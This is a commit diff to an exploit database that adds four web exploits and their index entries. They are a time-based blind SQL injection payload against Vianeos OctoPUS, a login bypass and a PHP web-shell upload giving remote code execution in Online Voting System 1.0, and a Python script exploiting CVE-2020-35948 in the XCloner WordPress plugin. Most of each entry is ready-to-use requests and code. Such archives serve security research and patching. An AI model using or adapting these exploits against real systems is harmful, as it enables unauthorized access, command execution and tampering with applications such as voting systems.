DB: 2021-07-02

4 changes to exploits/shellcodes Online Voting System 1.0 - Authentication Bypass (SQLi) Online Voting System 1.0 - Remote Code Execution (Authenticated) Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) Vianeos OctoPUS 5 - 'login_user' SQLi
2021-07-02 05:01:54 +00:00 · 2021-07-02 05:01:54 +00:00 · 4f3cf46cbf
commit 4f3cf46cbf
parent 293ca2aadb
5 changed files with 255 additions and 0 deletions
--- a/exploits/multiple/webapps/50078.txt
+++ b/exploits/multiple/webapps/50078.txt
@ -0,0 +1,19 @@
+# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
+# Date: 01/07/2021
+# Exploit Author: Audencia Business SCHOOL
+# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
+# Software Link: http://www.vianeos.com/en/octopus/
+# Version: > V5
+# Tested on: Fedora / Apache2 / MariaDB
+
+
+Octopus V5 SQLi
+
+The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow :
+
+```
+Parameter: login_user (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
+```
--- a/exploits/php/webapps/50075.txt
+++ b/exploits/php/webapps/50075.txt
@ -0,0 +1,35 @@
+# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
+# Exploit Author: deathflash1411
+# Date 30.06.2021
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
+# Version 1.0
+# Tested on: Ubuntu 20.04
+
+####################
+# Proof of Concept #
+####################
+
+POST /Online_voting_system/admin/ HTTP/1.1
+Host: localhost
+Content-Length: 50
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/Online_voting_system/admin/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
+Connection: close
+
+UserName=admin&Password=%27+or+%27%27%3D%27&Login=
+
+###########
+# Payload #
+###########
+
+UserName=admin
+Password=' or ''='
--- a/exploits/php/webapps/50076.txt
+++ b/exploits/php/webapps/50076.txt
@ -0,0 +1,76 @@
+# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
+# Exploit Author: deathflash1411
+# Date 30.06.2021
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
+# Version 1.0
+# Tested on: Ubuntu 20.04
+
+####################
+# Proof of Concept #
+####################
+
+POST /Online_voting_system/admin/save_candidate.php HTTP/1.1
+Host: localhost
+Content-Length: 1253
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/Online_voting_system/admin/new_candidate.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
+Connection: close
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="user_name"
+
+admin
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rfirstname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rlastname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rgender"
+
+Male
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="ryear"
+
+1st year
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rmname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rposition"
+
+Governor
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="party"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="image"; filename="test.php"
+Content-Type: application/octet-stream
+
+<?php echo exec("whoami"); ?>
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="save"
+
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW--
+
+########
+# Note #
+########
+
+Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
--- a/exploits/php/webapps/50077.py
+++ b/exploits/php/webapps/50077.py
@ -0,0 +1,121 @@
+# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
+# Date 30.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.xcloner.com/
+# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
+# Version: 4.2.1 - 4.2.12
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2020-35948
+# CWE: CWE-732
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md
+
+'''
+Description:
+An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, 
+including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, 
+for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
+'''
+
+
+'''
+Banner:
+'''
+banner = """
+
+
+  #####  #     # #######        #####    ###    #####    ###          #####  #######  #####  #        #####  
+ #     # #     # #             #     #  #   #  #     #  #   #        #     # #       #     # #    #  #     # 
+ #       #     # #                   # #     #       # #     #             # #       #     # #    #  #     # 
+ #       #     # #####   #####  #####  #     #  #####  #     # #####  #####  ######   ###### #    #   #####  
+ #        #   #  #             #       #     # #       #     #             #       #       # ####### #     # 
+ #     #   # #   #             #        #   #  #        #   #        #     # #     # #     #      #  #     # 
+  #####     #    #######       #######   ###   #######   ###          #####   #####   #####       #   #####  
+                                                                                                             
+                                                                                                             
+                                                                
+                                                                by @Hacker5preme
+"""
+print(banner)
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+print('')
+ajax_cmd = input('[*] Ajax Command to execute: ')
+
+'''
+Authentication:
+'''
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log':  username, 
+    'pwd': password, 
+    'wp-submit': 'Log In', 
+    'testcookie': '1'
+}
+
+# Authenticate:
+print('')
+auth = session.post(auth_url, headers=header, data=body)
+auth_header= auth.headers['Set-Cookie']
+if 'wordpress_logged_in' in auth_header:
+    print('[+] Authentication successfull !')
+else:
+    print('[-] Authentication failed !')
+    exit()
+
+
+'''
+Exploit:
+'''
+url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"
+
+header = {
+    "Accept": "*/*",
+    "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
+    "Connection": "close"
+}
+
+# Body:
+body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)
+
+exploit = session.post(url_exploit, headers=header, data=body)
+print('')
+print(exploit.text)
+print('')
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44207,9 +44207,13 @@ id,file,description,date,author,type,platform,port
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
+50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",2021-07-01,"Salman Asad",webapps,php,
 50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
 50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
+50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
+50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
+50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,